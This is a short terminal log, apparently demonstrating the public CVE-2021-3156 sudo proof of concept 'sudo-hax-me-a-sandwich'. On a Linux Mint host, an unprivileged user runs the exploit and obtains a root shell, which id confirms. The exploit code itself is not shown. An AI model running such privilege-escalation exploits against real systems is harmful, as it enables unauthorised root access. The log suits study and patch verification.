test@linux-mint-19-2:~/Desktop/CVE-2021-3156$ id
uid=1001(test) gid=1001(test) groups=1001(test)
test@linux-mint-19-2:~/Desktop/CVE-2021-3156$ uname -a
Linux linux-mint-19-2 4.15.0-20-generic #21-Ubuntu SMP Tue Apr 24 06:16:15 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
test@linux-mint-19-2:~/Desktop/CVE-2021-3156$ sudo -l
Matching Defaults entries for test on linux-mint-19-2:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User test may run the following commands on linux-mint-19-2:
    (root) NOPASSWD: /usr/lib/linuxmint/mintUpdate/checkAPT.py
test@linux-mint-19-2:~/Desktop/CVE-2021-3156$ ./sudo-hax-me-a-sandwich 0
** CVE-2021-3156 PoC by blasty <peter@haxx.in>
using target: 'Ubuntu 20.04.1 (Focal Fossa) - sudo 1.8.31, libc-2.31'
** pray for your rootshell.. **
[+] bl1ng bl1ng! We got it!
# id
uid=0(root) gid=0(root) groups=0(root),1001(test)
#